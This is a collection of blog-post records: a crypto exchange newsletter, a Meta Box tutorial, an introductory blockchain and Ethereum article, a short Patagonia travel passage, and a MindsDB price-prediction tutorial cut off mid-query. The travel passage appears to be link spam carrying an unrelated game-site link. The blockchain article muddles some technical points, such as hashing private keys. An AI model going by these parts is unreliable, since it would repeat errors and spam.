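        remaining -= fill
        if remaining == 0:
            break
    if remaining > 0:
        raise ValueError("not enough liquidity for this amount")
    avg_price = cost / amount
    return (avg_price - first_price) / first_price

# A thin book: buying more moves the average fill price up.
asks = [(1.00, 100), (1.05, 100), (1.10, 100)]
print(price_impact(asks, 50))   # fills only the best order -> 0.0
print(price_impact(asks, 200))  # roughly 0.025, i.e. a 2.5% impact
```

The same walk over bid orders would give the impact of a sell; the point is that the deeper the order you have to reach, the worse your average execution price gets.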
🔗 https://xpmarket.com/swap

P.S. As this is very sensitive information, we have made the text smaller in order to first get feedback from our most dedicated users. We will soon consider the beta testing finished, and the text will be made more noticeable.
## Global Search
This is by far the most significant improvement we have introduced in the recent update, as it significantly boosts user experience and navigation speed. Now straight from the home page you can enter the token’s name/ticker and it will be shown in the list. All you have to do is just click on it! In addition to directing users to the token page only, we are showing whether the token is also available on the DEX. This means you can find almost all tokens straight away from a single place, no matter whether this is a profile page or DEX.

There are some exclusion rules, however. If a token has zero market cap and no twitter account, it will be excluded from the search. We are still testing the algorithms to cut off dead projects, hence this threshold might change in future.
## XRPL Statistics
Whether you are a developer, statistician, or just curious, there is a statistics page where you can retrospectively track the development of XRPL’s ecosystem. We provide access to historic data on the number of trustlines, volumes (DEX, CEX, and total), and market cap.
This month we have changed the rules for how the total market cap is calculated. Due to a set of technical limitations and the complexity of such calculations, the total market cap is the sum of the Top 100 projects' capitalisation. While it excludes a lot of tokens, it reflects the actual value with 97-98% accuracy.
🔗 https://xpmarket.com/xrpl-statistics

## New DEX Layout
We have updated DEX layout both on Mobile and Desktop versions. Now it is much more convenient, as all elements are within reach and sight. We have also made a few smaller changes that might not be noticeable at first, but help with overall experience.

## Seedling IDO
Our partners at Seedling.cm have conducted an exclusive IDO of our native token. The event was a huge success, as the whole allocation was sold out in less than 7 minutes. Do not worry if you were unable to participate, as the allocation was small and the number of participants was limited. There will be an opportunity for everyone in future.
This is an extra step into XRPL’s popularisation within the wider blockchain community!
# Operations
## Web Summit
We are attending a Web Summit in Lisbon, Portugal. The event takes place from 1-4 November. We will have a booth showcasing our vision, achievements, and future plans. If you are around, you can find us on 2 November at A215.
## Partnerships
We are happy to announce that 32ventures joined XPmarket as an investor and partner. We are going to work together on expanding XRPL ecosystem and improving XPmarket.
## We are hiring!
We are looking for people who can help us with quality assurance. Our community has been working on this for a long time, but we would like to do a more thorough testing before releasing the results into production. If you know a good QA specialist who is skilled at XRPL we would be very grateful for recommendations.
Thank you for reading and supporting us. We are very happy to see the start of this journey. As always, I am ready to answer all your questions, so I look forward to hearing from you.
| outrum |
1,237,941 | How to Create a Product Page - P5 - Using Meta Box and Gutenberg | To continue the series about creating a product page, we have a new way to do it using MB Views only. It's a Meta Box extension. If you are using a theme without any page builders or just... | 19,769 | 2022-11-01T02:14:23 | https://metabox.io/create-product-page-p5-meta-box-gutenberg/ | tutorial, customfields, gutenberg, productpage | To continue the series about creating a product page, we have a new way to do it using MB Views only. It's a Meta Box extension. If you are using a theme without any page builder, or just Gutenberg, this tutorial will work for you.
As in the previous part of this series, I also take a detailed page about car rental as an example.

Video Version
-------------
https://youtu.be/DnKcWGkyhEQ
Before Getting Started
----------------------
The product is a kind of custom post type. In this case, each car for rent will be a post in that post type. The product's name and its descriptions are the title and content of the post. We'll need some extra information about the cars such as price, image gallery, type of fuel, etc. So, we use custom fields to save that data.

To create custom post types and custom fields, we use the [Meta Box core plugin](https://wordpress.org/plugins/meta-box/). It's free and available on [wordpress.org.](https://wordpress.org/plugins/meta-box/)
For more advanced features, we also need some Meta Box extensions. You can use **Meta Box AIO** or install the following extensions individually:
- [MB Custom Post Type](https://metabox.io/plugins/custom-post-type/): to create custom post types;
- [Meta Box Builder](https://metabox.io/plugins/meta-box-builder/): to have a UI on the back end to create custom fields easily;
- [MB Views](https://metabox.io/plugins/mb-views/): to create a template for the product page without touching the theme file.
Step 1: Create a New Custom Post Type
-------------------------------------
Go to **Meta Box** > **Post Types** > **New Post Type** to create a new custom post type.

Step 2: Create Custom Fields
----------------------------
Go to **Meta Box** > **Custom Fields**, then create fields as you want.

In this tutorial, I just take a typical example of car rental with some common fields. They are all very simple and don't require any particular setting. Here are the fields that I created.

Next, move to the **Settings** tab > **Location** > choose **Post Type** as **Car Rental** to apply these fields to this post type.

In the post editor, you will see all of the newly created custom fields.

Step 3: Create a Template
-------------------------
To display the product's details, you normally have to go to the theme's files to add code or use a page builder. However, you have another way with the **MB Views** extension to create templates without touching the theme's files.
Go to **Meta Box** > **Views** to create a new template. Instead of typing code into the box in the **Template** tab, you can insert fields to get their data.

Just click the **Insert Field** button and choose which one you want.
First, I'll create a slider with many product images, so insert the **Gallery** field and choose an image size for it.

Next, insert the product name and its description. They are the default fields of WordPress.
In terms of the fuel, door, and gearbox information, because they are **select** fields, you'll have a setting where you can choose the output of the options as **Value** or **Label**.

Moving on, I'll insert the remaining fields as usual.

In the **Settings** section of the view, set the **Type** section as **Singular** to assign this template to a single post page. Then, add a rule in the **Location** section to apply it to the Car Rental page only.

Now, go to the product page, all the product information is displayed already.

It is so messy now. We'll need some JS and CSS to make it more beautiful with a better layout.
Step 4: Style the Page
----------------------
Before styling, let's add some **div** tags to separate the page into different sections for easier styling.

Next, go to the CSS tab, add some code.

Also add some code in the JavaScript tab. This is to create a slider for the gallery.

All of these codes are available on [Github](https://github.com/wpmetabox/tutorials/tree/master/create-a-product-page-with-MB-Views), you can refer to it.
After updating the template, you'll see the new look of the page on the frontend.

Last Words
----------
Hopefully, the steps above will lend you a hand in creating an advanced product page. In case you plan to build your own product page using other page builders besides Gutenberg, there are some interesting options for you [here](https://metabox.io/series/product-page/). Keep track and send us your ideas if you wish for more tutorials. Good luck! | wpmetabox |
1,272,822 | Blockchain Technology | Blockchain Technology By Lebohang Bernard Motseki | Email: lbmotseki@gmail.com Introduction As... | 0 | 2022-11-25T20:32:59 | https://dev.to/motseki/blockchain-technology-13o0 | Blockchain Technology
By Lebohang Bernard Motseki | Email: lbmotseki@gmail.com
Introduction
As blockchain continues to grow and become more user-friendly, the obligation is on individuals to learn this evolving technology to prepare for the future. If you are new to blockchain, then this is the right place to gain solid foundational knowledge. In this article, you will learn how to answer the question, "What is blockchain technology?" You'll also learn how blockchain works, why it's important, and how you can use this field to advance your career. Blockchain applications go far beyond cryptocurrency and bitcoin. With its ability to create more transparency and fairness while also saving businesses time and money, the technology is impacting a variety of sectors in ways that range from how contracts are enforced to making government work more efficiently.
What Is Blockchain Technology?
Blockchain is a method of recording information that makes it impossible or difficult for the system to be changed, hacked, or manipulated. It is a distributed ledger that duplicates and distributes transactions across the network of computers participating in the blockchain. Blockchain technology is a structure that stores transactional records, also known as the block, of the public in several databases, known as the “chain,” in a network connected through peer-to-peer nodes. Typically, this storage is referred to as a ‘digital ledger. Every transaction in this ledger is authorized by the digital signature of the owner, which authenticates the transaction and safeguards it from tampering. Hence, the information the digital ledger contains is highly secure.
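The "chain" structure described above can be sketched in a few lines of Python. This is a conceptual illustration only, assuming SHA-256 for block hashes; real networks add consensus, digital signatures, and much more:

```python
import hashlib
import json

def block_hash(block):
    # Hash the block's contents deterministically with SHA-256.
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def add_block(chain, transactions):
    # Each new block records the hash of the block before it.
    prev = block_hash(chain[-1]) if chain else "0" * 64
    chain.append({"prev_hash": prev, "transactions": transactions})

def chain_is_valid(chain):
    # Every block must reference the hash of its predecessor.
    return all(
        chain[i]["prev_hash"] == block_hash(chain[i - 1])
        for i in range(1, len(chain))
    )

chain = []
add_block(chain, [{"from": "A", "to": "B", "amount": 5}])
add_block(chain, [{"from": "B", "to": "C", "amount": 2}])
print(chain_is_valid(chain))                 # True
chain[0]["transactions"][0]["amount"] = 500  # tamper with history
print(chain_is_valid(chain))                 # False
```

Because each block embeds the previous block's hash, changing any earlier record invalidates every block after it, which is what makes the ledger so difficult to manipulate.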
Types of Blockchain
There are four different types of blockchains. They are as follows:
Private Blockchain Networks
Private blockchains operate on closed networks, and tend to work well for private businesses and organizations. Companies can use private blockchains to customize their accessibility and authorization preferences, parameters to the network, and other important security options. Only one authority manages a private blockchain network.
Public Blockchain Networks
Bitcoin and other cryptocurrencies originated from public blockchains, which also played a role in popularizing distributed ledger technology (DLT). Public blockchains also help to eliminate certain challenges and issues, such as security flaws and centralization. With DLT, data is distributed across a peer-to-peer network, rather than being stored in a single location. A consensus algorithm is used for verifying information authenticity; proof of stake (PoS) and proof of work (PoW) are two frequently used consensus methods.
Permissioned Blockchain Networks
Also sometimes known as hybrid blockchains, permissioned blockchain networks are private blockchains that allow special access for authorized individuals. Organizations typically set up these types of blockchains to get the best of both worlds, and it enables better structure when assigning who can participate in the network and in what transactions.
Consortium Blockchains
Similar to permissioned blockchains, consortium blockchains have both public and private components, except multiple organizations will manage a single consortium blockchain network. Although these types of blockchains can initially be more complex to set up, once they are running, they can offer better security. Additionally, consortium blockchains are optimal for collaboration with multiple organizations.
Why is Blockchain Popular?
Suppose you are transferring money to your family or friends from your bank account. You would log in to online banking and transfer the amount to the other person using their account number. When the transaction is done, your bank updates the transaction records. It seems simple enough, right? There is a potential issue which most of us neglect.
These types of transactions can be tampered with very quickly. People who are familiar with this truth are often wary of using these types of transactions, hence the evolution of third-party payment applications in recent years. But this vulnerability is essentially why Blockchain technology was created. Technologically, Blockchain is a digital ledger that is gaining a lot of attention and traction recently. But why has it become so popular? Well, let’s dig into it to fathom the whole concept.
Record keeping of data and transactions are a crucial part of the business. Often, this information is handled in house or passed through a third party like brokers, bankers, or lawyers increasing time, cost, or both on the business. Fortunately, Blockchain avoids this long process and facilitates the faster movement of the transaction, thereby saving both time and money.
Most people assume Blockchain and Bitcoin can be used interchangeably, but in reality, that’s not the case. Blockchain is the technology capable of supporting various applications related to multiple industries like finance, supply chain, manufacturing, etc., but Bitcoin is a currency that relies on Blockchain technology to be secure.
What Is a Blockchain Platform?
While a blockchain network describes the distributed ledger infrastructure, a blockchain platform describes a medium where users can interact with a blockchain and its network. Blockchain platforms are created to be scalable and act as extensions from an existing blockchain infrastructure, allowing information exchange and services to be powered directly from this framework. An example of a blockchain platform includes Ethereum, a software platform which houses the Etherium, or ether, cryptocurrency. With the Ethereum platform, users can also create programmable tokens and smart contracts which are built directly upon the Ethereum blockchain infrastructure.
What is Ethereum?
Ethereum is an open source, distributed software platform based on blockchain technology. It is a decentralized open-source platform used to run smart contracts, i.e. applications that execute exactly as programmed without the possibility of fraud, interference from a third party, censorship, or downtime. It serves as a platform for nearly 260,000 different cryptocurrencies. It has its own native cryptocurrency called Ether and a programming language called Solidity. Ether is a cryptocurrency generated by Ethereum miners, used as a reward for the computations performed to secure the blockchain. Ethereum is Bitcoin's main competitor. Ethereum enables developers to build decentralized applications. Miners produce Ether tokens that can be used as a currency and to pay for usage fees on the Ethereum network.
It is an open-source blockchain platform that offers smart contract facilities, which are a type of digital contract. Solidity was first introduced as a new type of programing language for the Ethereum platform. Developers use the Solidity programming language to develop smart contracts. Using Solidity, you can program the contracts to do any type of task. Cryptocurrency researcher Vitalik Buterin first described Ethereum in a proposal in 2013 that suggested the addition of a scripting language for programming to Bitcoin. Ethereum's development was funded by an online crowdsale, which is crowdfunding done through issuing cryptocurrency tokens, and the project came online on July 30, 2015.
Ethereum Virtual Machine (EVM)
The Ethereum Virtual Machine, abbreviated as EVM, is a runtime environment for executing smart contracts in Ethereum. It focuses on providing security and executing untrusted code using an international network of public nodes. The EVM is specialized to prevent denial-of-service attacks, confirms that programs do not have access to each other's state, and ensures that communication is established without any potential interference.
How does Ethereum work?
Ethereum uses a blockchain network. The network is made up of nodes: computers of volunteers who mine for the coin. The nodes produce the Ether tokens, and mining creates the cryptography upon which the currency is based. Because mining is a demanding use of a computer's resources, miners are rewarded with Ether. The Ethereum platform offers the computationally complete Ethereum Virtual Machine (EVM). The EVM executes scripts worldwide across its network of distributed public nodes. These nodes provide the processing power for the decentralized applications developers create to run on the network. Developers may buy Ether to pay for use of the network, or they can mine the tokens themselves, becoming part of the network. An internal mechanism called gas sets the pricing of transactions on the network.
What is Smart Contract?
Smart contracts are high-level program code compiled to EVM bytecode and deployed to the Ethereum blockchain for execution. They allow us to perform credible transactions without the interference of a third party; these transactions are trackable and irreversible. Languages used to write smart contracts include Solidity (a language with similarities to C and JavaScript), Serpent (similar to Python, but deprecated), LLL (a low-level Lisp-like language), and Mutan (Go-based, but deprecated). Smart contracts are carried across the network in the same blockchain that records the ledger of transactions for the Ether cryptocurrency. These digital contracts can have conditions that run in scripts until fulfilled. Ethereum has built-in mechanisms to detect when an agreement is not met. Smart contracts can be used to exchange things such as property, money, and stocks on the back of an Ether token.
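As a rough illustration of the idea, the toy escrow below simulates a contract that pays out only when a pre-configured condition is met. Real Ethereum contracts are written in Solidity and run on the EVM; every name here is made up for the sketch:

```python
class EscrowContract:
    """Toy escrow: funds stay locked until the agreed condition is met."""

    def __init__(self, buyer, seller, amount, condition):
        self.buyer, self.seller, self.amount = buyer, seller, amount
        self.condition = condition          # callable returning True/False
        self.balance = {buyer: amount, seller: 0}
        self.settled = False

    def execute(self):
        # Runs exactly as programmed: pays out only if the condition holds,
        # and never pays twice.
        if not self.settled and self.condition():
            self.balance[self.buyer] -= self.amount
            self.balance[self.seller] += self.amount
            self.settled = True
        return self.settled

delivered = {"done": False}
contract = EscrowContract("alice", "bob", 10, lambda: delivered["done"])
print(contract.execute(), contract.balance)  # False, funds still locked
delivered["done"] = True                     # the condition is now met
print(contract.execute(), contract.balance)  # True, payment released
```

On a real chain the condition would be checked against on-chain state and the transfer recorded in the ledger, but the control flow is the same: code, not a middleman, enforces the agreement.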
From the time of Ethereum's creation in July 2015 until Sept. 15, 2022, Ethereum used the Proof of Work (PoW) model to execute and verify transactions with the cryptocurrency, using the Ethereum Mainnet blockchain. Proof of Work is a type of consensus algorithm that is used for verification and data integrity. On Sept. 15, 2022, the Ethereum community completed what is known as "The Merge" with a transition to a Proof of Stake (PoS) consensus algorithm running on the Beacon Chain. For Ethereum and its users the benefit of moving to Proof of Stake (PoS), include potentially faster transaction speeds, while using less overall energy to process and validate transactions.
Ethereum and Ether: What is the difference?
Ethereum is a blockchain-based network. It is a platform that developers can use to build applications and program the smart contracts on which virtual currency is based. Like blockchain, it can be used for many different types of applications, including a number of financial uses. Ether (ETH) is Ethereum's native cryptocurrency. It is bought and sold using the Ethereum platform. It is one of many cryptocurrencies that can be traded using the Ethereum network. It is also used to reward miners when they add blocks to a blockchain. Ether supports the Ethereum network; it pays for computational services and applications built on the platform. It is described as the fuel that Ethereum runs on.
The Process of Transaction
One of blockchain technology's cardinal features is the way it confirms and authorizes transactions. For example, if two individuals wish to perform a transaction, each holding a private and public key, the first party would attach the transaction information to the public key of the second party. All of this information is gathered together into a block.
The block contains a digital signature, a timestamp, and other important, relevant information. It should be noted that the block doesn’t include the identities of the individuals involved in the transaction. This block is then transmitted across all of the network's nodes, and when the right individual uses his private key and matches it with the block, the transaction gets completed successfully.
In addition to conducting financial transactions, the Blockchain can also hold transactional details of properties, vehicles, etc.
Here’s a use case that illustrates how Blockchain works:
• Hash Encryptions
Blockchain technology uses hashing and encryption to secure the data, relying mainly on the SHA-256 algorithm. The sender's address (public key), the receiver's address, the transaction, and the sender's private key details are transmitted via the SHA-256 algorithm. The encrypted information, called hash encryption, is transmitted across the world and added to the blockchain after verification. The SHA-256 algorithm makes it almost impossible to hack the hash encryption, which in turn simplifies authentication of the sender and receiver.
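The SHA-256 step can be tried directly with Python's standard library. The transaction fields below are made-up placeholders, not a real wallet format:

```python
import hashlib

transaction = "sender_pubkey|receiver_addr|amount=1.5"
digest = hashlib.sha256(transaction.encode()).hexdigest()

# A 256-bit digest rendered as 64 hex characters, as described above.
print(len(digest))  # 64

# Changing a single character of the input changes the digest completely,
# which is what makes the hash practically impossible to forge.
tampered = hashlib.sha256(b"sender_pubkey|receiver_addr|amount=9.5").hexdigest()
print(digest == tampered)  # False
```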
• Proof of Work
In a Blockchain, each block consists of 4 main headers.
• Previous Hash: This hash address locates the previous block.
• Transaction Details: Details of all the transactions that need to occur.
• Nonce: An arbitrary number given in cryptography to differentiate the block’s hash address.
• Hash Address of the Block: All of the above (i.e., preceding hash, transaction details, and nonce) are transmitted through a hashing algorithm. This gives an output containing a 256-bit, 64 character length value, which is called the unique ‘hash address.’ Consequently, it is referred to as the hash of the block.
• Numerous people around the world try to figure out the right hash value to meet a pre-determined condition using computational algorithms. The transaction completes when the predetermined condition is met. To put it more plainly, Blockchain miners attempt to solve a mathematical puzzle, which is referred to as a proof of work problem. Whoever solves it first gets a reward.
• Mining
In Blockchain technology, the process of adding transactional details to the present digital/public ledger is called ‘mining.’ Though the term is associated with Bitcoin, it is used to refer to other Blockchain technologies as well. Mining involves generating the hash of a block transaction, which is tough to forge, thereby ensuring the safety of the entire Blockchain without needing a central system.
What Is a Miner in Blockchain?
Miners create new blocks on the chain through a process called mining. In a blockchain, every block has its own unique nonce and hash, but also references the hash of the previous block in the chain, so mining a block isn't easy, especially on large chains. Miners use special software to solve the incredibly complex math problem of finding a nonce that generates an accepted hash. Because the nonce is only 32 bits while the hash is 256, there are roughly four billion possible nonce values that may need to be tried before the right one is found. When that happens, miners are said to have found the "golden nonce" and their block is added to the chain.
Blockchain is an emerging technology with many advantages in an increasingly digital world:
The advantages of Blockchain technology outweigh the regulatory issues and technical challenges. One key emerging use case of blockchain technology involves "smart contracts". Smart contracts are basically computer programs that can automatically execute the terms of a contract. When a pre-configured condition in a smart contract among participating entities is met, the parties involved in the contractual agreement can be paid automatically, as per the contract, in a transparent manner.

Smart Property is another related concept, concerned with controlling the ownership of a property or asset via the blockchain using smart contracts. The property can be physical, such as a car, house, or smartphone, or it can be non-physical, such as shares of a company. It should be noted here that even Bitcoin is not really a currency; Bitcoin is all about controlling the ownership of money.

Blockchain technology is finding applications in a wide range of areas, both financial and non-financial. Financial institutions and banks no longer see blockchain technology as a threat to traditional business models. The world's biggest banks are in fact looking for opportunities in this area by doing research on innovative blockchain applications. In a recent interview, Rain Lohmus of Estonia's LHV bank said that they found blockchain to be the most tested and secure for some banking and finance related applications. Non-financial application opportunities are also endless. We can envision putting proof of existence of legal documents, health records, loyalty payments in the music industry, notarized documents, private securities, and marriage licenses on the blockchain. By storing the fingerprint of the digital asset instead of storing the digital asset itself, the anonymity or privacy objective can be achieved.
• Highly Secure
It uses a digital signature feature to conduct fraud-free transactions, making it impossible for other users to corrupt or change an individual's data without that individual's specific digital signature.
• Decentralized System
Conventionally, you need the approval of regulatory authorities like a government or bank for transactions; however, with Blockchain, transactions are done with the mutual consensus of users resulting in smoother, safer, and faster transactions.
• Automation Capability
It is programmable and can generate systematic actions, events, and payments automatically when the criteria of the trigger are met.
Disadvantages
Blockchain and cryptography involves the use of public and private keys, and reportedly, there have been problems with private keys. If a user loses their private key, they face numerous challenges, making this one disadvantage of blockchains. Another disadvantage is the scalability restrictions, as the number of transactions per node is limited. Because of this, it can take several hours to finish multiple transactions and other tasks. It can also be difficult to change or add information after it is recorded, which is another significant disadvantage of blockchain.
Blockchain in Money Transfer
Pioneered by Bitcoin, cryptocurrency transfer apps are exploding in popularity right now. Blockchain is especially popular in finance for the money and time it can save financial companies of all sizes.
By eliminating bureaucratic red tape, making ledger systems real-time and reducing third-party fees, blockchain can save the largest banks lots of money. These companies use blockchain to efficiently transfer money.
Blockchain Smart Contracts
Smart contracts are like regular contracts except the rules of the contract are enforced in real-time on a blockchain, which eliminates the middleman and adds levels of accountability for all parties involved in a way not possible with traditional agreements. This saves businesses time and money, while also ensuring compliance from everyone involved.
Blockchain-based contracts are becoming more and more popular as sectors like government, healthcare and the real estate industry discover the benefits. Below are a few examples of how companies are using blockchain to make contracts smarter.
Blockchain in Healthcare
Blockchain in healthcare, though early in its adoption, is already showing some promise. In fact, early blockchain solutions have shown the potential to reduce healthcare costs, improve access to information across stakeholders and streamline business processes. An advanced system for collecting and sharing private information could be just what the doctor ordered to make sure that an already bloated sector can trim down exorbitant costs.
Blockchain Logistics
A major complaint in the shipping industry is the lack of communication and transparency due to the large number of logistics companies crowding the space. According to a joint study by Accenture and logistics giant DHL, there are more than 500,000 shipping companies in the US, causing data siloing and transparency issues. The report goes on to say blockchain can solve many of the problems plaguing logistics and supply chain management.
The study argues that blockchain enables data transparency by revealing a single source of truth. By acknowledging data sources, blockchain can build greater trust within the industry. The technology can also make the logistics process leaner and more automated, potentially saving the industry billions of dollars a year. Blockchain is not only safe, but a cost-effective solution for the logistics industry.
Blockchain and NFTs
Non-fungible tokens (NFTs) have been the hottest blockchain application since cryptocurrency. The year 2021 brought a rise in these digital items that are currently taking the world by storm. NFTs are simply digital items, like music, art, GIFs and videos that are sold on a blockchain, ensuring that a sole owner can claim full rights to it. Thanks to blockchain technology, consumers can now claim sole ownership over some of the most desirable digital assets out there.
Blockchain in Government
One of the most surprising applications for blockchain can be in the form of improving government. As mentioned previously, some state governments like Illinois are already using the technology to secure government documents, but blockchain can also improve bureaucratic efficiency, accountability and reduce massive financial burdens. Blockchain has the potential to cut through millions of hours of red tape every year, hold public officials accountable through smart contracts and provide transparency by recording a public record of all activity, according to the New York Times.
Blockchain may also revolutionize our elections. Blockchain-based voting could improve civic engagement by providing a level of security and incorruptibility that allows voting to be done on mobile devices.
The following companies and government entities are a few examples of how blockchain applications are improving government.
Blockchain in Media
Many of the current problems in media deal with data privacy, royalty payments and piracy of intellectual property. According to a study by Deloitte, the digitization of media has caused widespread sharing of content that infringes on copyrights. Deloitte believes blockchain can give the industry a much needed facelift when it comes to data rights, piracy and payments.
Blockchain’s strength in the media industry is its ability to prevent a digital asset, such as an mp3 file, from existing in multiple places. It can be shared and distributed while also preserving ownership, making piracy virtually impossible through a transparent ledger system. Additionally, blockchain can maintain data integrity, allowing advertising agencies to target the right customers, and musicians to receive proper royalties for original works.
WHAT IS PROOF-OF-STAKE (POS)?
Proof-of-stake underlies certain consensus mechanisms used by blockchains to achieve distributed consensus. In proof-of-work, miners prove they have capital at risk by expending energy. Ethereum uses proof-of-stake, where validators explicitly stake capital in the form of ETH into a smart contract on Ethereum. This staked ETH then acts as collateral that can be destroyed if the validator behaves dishonestly or lazily. The validator is then responsible for checking that new blocks propagated over the network are valid and occasionally creating and propagating new blocks themselves.
Proof-of-stake comes with a number of improvements to the now-deprecated proof-of-work system:
• Better energy efficiency – there is no need to use lots of energy on proof-of-work computations
• Lower barriers to entry, reduced hardware requirements – there is no need for elite hardware to stand a chance of creating new blocks
• Reduced centralization risk – proof-of-stake should lead to more nodes securing the network
• Because of the low energy requirement, less ETH issuance is required to incentivize participation
• Economic penalties for misbehaviour make 51% style attacks exponentially more costly for an attacker compared to proof-of-work
• The community can resort to social recovery of an honest chain if a 51% attack were to overcome the crypto-economic defenses.
VALIDATORS
To participate as a validator, a user must deposit 32 ETH into the deposit contract and run three separate pieces of software: an execution client, a consensus client, and a validator. On depositing their ETH, the user joins an activation queue that limits the rate of new validators joining the network. Once activated, validators receive new blocks from peers on the Ethereum network. The transactions delivered in the block are re-executed, and the block signature is checked to ensure the block is valid. The validator then sends a vote (called an attestation) in favor of that block across the network.
Whereas under proof-of-work, the timing of blocks is determined by the mining difficulty, in proof-of-stake, the tempo is fixed. Time in proof-of-stake Ethereum is divided into slots (12 seconds) and epochs (32 slots). One validator is randomly selected to be a block proposer in every slot. This validator is responsible for creating a new block and sending it out to other nodes on the network. Also in every slot, a committee of validators is randomly chosen, whose votes are used to determine the validity of the block being proposed.
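The fixed tempo above is simple arithmetic. A sketch, counting from genesis and ignoring real-world details like missed slots:

```python
SECONDS_PER_SLOT = 12
SLOTS_PER_EPOCH = 32

def slot_at(seconds_since_genesis):
    # Each slot lasts 12 seconds.
    return seconds_since_genesis // SECONDS_PER_SLOT

def epoch_of(slot):
    # Each epoch groups 32 slots.
    return slot // SLOTS_PER_EPOCH

print(slot_at(400))            # 400 s after genesis falls in slot 33
print(epoch_of(slot_at(400)))  # which belongs to epoch 1
```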
What is a Proof of Stake (PoS) consensus algorithm?
A Proof of Stake (PoS) consensus algorithm is a set of rules governing a blockchain network and the creation of its native coin; that is, it has the same objective as a Proof of Work (PoW) algorithm in the sense that it is an instrument to achieve consensus. Unlike PoW, there are no miners involved in the process. Instead, participants in the network who want to be involved in proving the validity of network transactions and creating blocks in a PoS network have to hold a certain stake in the network, for instance by placing a certain amount of the network's currency in a wallet connected to its blockchain.
This is known as “placing a stake” or “staking”. A block creator in a PoS system is limited to creating blocks proportionate to his or her stake in the network. Thus, PoS networks are based on deterministic algorithms, meaning that validators of blocks are elected depending on the nature of the stake. For instance, selecting account balance as the sole criterion on which the next valid block in a blockchain is defined could potentially lead to unwanted centralisation. This would mean that wealthy members in a network would enjoy great advantages.
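A toy illustration of stake-proportional selection (not Ethereum's actual randomness mechanism), which also shows why balance-only selection favors the wealthiest participants:

```python
import random

def pick_proposer(stakes, rng):
    # Each validator is chosen with probability proportional to its stake.
    validators = list(stakes)
    weights = [stakes[v] for v in validators]
    return rng.choices(validators, weights=weights, k=1)[0]

stakes = {"alice": 96, "bob": 32, "carol": 32}  # alice holds 60% of total stake
rng = random.Random(42)  # seeded so the simulation is reproducible
picks = [pick_proposer(stakes, rng) for _ in range(1000)]
print(picks.count("alice") / 1000)  # close to alice's 0.6 stake share
```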
| motseki | |
1,238,310 | which were a strange blue, like that of toothpaste or laundry detergent? | As I explored farther, I began to see the glacier's arteries and veins, which were a strange blue,... | 0 | 2022-11-01T08:26:35 | https://dev.to/likelylifestyle/which-were-a-strange-blue-like-that-of-toothpaste-or-laundry-detergent-5d0j | javascript, react, devops, html | As I explored farther, I began to see the glacier's arteries and veins, which were a strange blue, like that of toothpaste or laundry detergent. Water from [drift hunters](https://drifthunters2.io) sapphire ponds was bottled and it was icy and minerally. For a little while, the winds died down within this cocoon. When we returned over the lake and back down into the steppe, though, they sprang back to life with a roar.
El Calafate, where I was staying, and El Chaltén are the only two cities in this region of Argentine Patagonia (where I was headed). The resort town of El Calafate has been there for quite some time, perched on the edge of the small harbor of Bahia Redonda on Lago Argentino. There are chocolate manufacturers, barbeque restaurants, and gift stores selling bittersweet jams produced from the berries of the town's namesake plant that line its pine-shaded avenues, providing a welcome splash of green on the otherwise parched steppe.
To get to El Chaltén, the neighboring village, I had to drive four hours north over green plains mowed by skittish guanacos, the wild relatives of the llama. Only one roadhouse, La Leona, was found along the journey. It was located off of National Route 40. The American criminals Butch Cassidy and the Sundance Kid are said to have crashed there in 1905 after stealing a bank there. Over the next decades, La Leona was frequented by hikers looking to begin their ascents of the gnarled peaks seen in the distance, including Mount Fitz Roy. It wasn't until 2021 that El Chaltén, "Argentina's newest town," which had been a popular destination for hikers and climbers since the 1980s, could host a public cemetery. | drifthunters |
1,238,603 | Predicting Mobile Phone Prices with MindsDB | Introduction MindsDB is an Open-Source AI Layer for databases, For more details,... | 0 | 2022-11-04T17:31:35 | https://dev.to/learnearnfun/predicting-mobile-phone-prices-with-mindsdb-138 | datascience, database, ai, machinelearning |

## Introduction
MindsDB is an open-source AI layer for databases. For more details, check out this [blog](https://dev.to/learnearnfun/quickstart-to-mindsdb-1ifm).
This tutorial will teach you how to train a model with MindsDB to predict a mobile phone's price based on many variables, such as clock_speed, battery_power, dual_sim, etc.
## Importing Data into MindsDB Cloud
In order to import the dataset to MindsDB Cloud, we need to first download it from Kaggle and then upload it simply to MindsDB using the steps mentioned below.
_**Step 1**_: Create a [MindsDB Cloud](https://cloud.mindsdb.com) Account, If you already haven't done so

_**Step 2**_: Download this [Dataset](https://www.kaggle.com/datasets/iabhishekofficial/mobile-price-classification)

**_Step 3_**: Go into Add Data -> Files -> Import File
Lastly, add the dataset. (After downloading, you will get a .zip file; extract it and import the CSV inside.)

_**Step 4**_: Name the Table

**_Step 5_**: To verify that the dataset has been imported successfully:
Run this Query:
```sql
SHOW TABLES FROM files;
```
If you see the dataset, then it's imported successfully!
We have imported our dataset into MindsDB, next up we will be creating a Predictor Model!
## Training a Model
**_Step 1_**: Creating a Predictor Model
MindsDB provides a syntax which exactly does that!
```sql
CREATE PREDICTOR mindsdb.predictor_name (Your Predictor Name)
FROM database_name (Your Database Name)
(SELECT columns FROM table_name LIMIT 10000) (Your Table Name)
PREDICT target_parameter; (Your Target Parameter)
```
Simply replace the parameters with the ones you want to use:
```sql
CREATE PREDICTOR mindsdb.mobileprice_predictor
FROM files
(SELECT * FROM MobilePrices LIMIT 10000)
PREDICT price_range;
```

**_Step 2_**: Depending on the size of the dataset, this might take some time.
There are 3 stages once you run the command to create the model:
1. _**Generating**_: The model's generating!
2. _**Training**_: Model is getting trained with the dataset
3. _**Complete**_: The model is ready to do predictions
To check the status, this is the query:
```sql
SELECT status
FROM mindsdb.predictors
WHERE name='mobileprice_predictor'
```
Once it returns `complete` we can start predicting with it!

## Describe the Model
Before we proceed to the final part of predicting mobile phone prices, let us first understand the model that we just trained.
MindsDB provides the following 3 types of descriptions for the model using the DESCRIBE statement.
1. By Features
2. By Model
3. By Model Ensemble
### By Features
```sql
DESCRIBE mindsdb.predictor_model_name.features;
```

This query shows the role of each column for the predictor model along with the type of encoders used on the columns while training.
### By Model
```sql
DESCRIBE mindsdb.predictor_model_name.model;
```

This query shows the list of all the underlying candidate models that were used during training. The one with the best performance is selected; it has the value 1 in the selected column, while the others are set to 0.
### By Model Ensemble
```sql
DESCRIBE mindsdb.predictor_model_name.ensemble;
```

This query gives back a JSON output that contains the different parameters that helped to choose the best candidate model for the Predictor Model.
As we are done understanding our Predictor model, let's move on to predicting values.
## Predicting the Target Value
We will start by predicting price_range using only 1 feature parameter, so the query looks like this.
NOTE: While predicting, it is best to input multiple feature parameters, as prediction accuracy degrades with fewer of them.
```sql
SELECT price_range
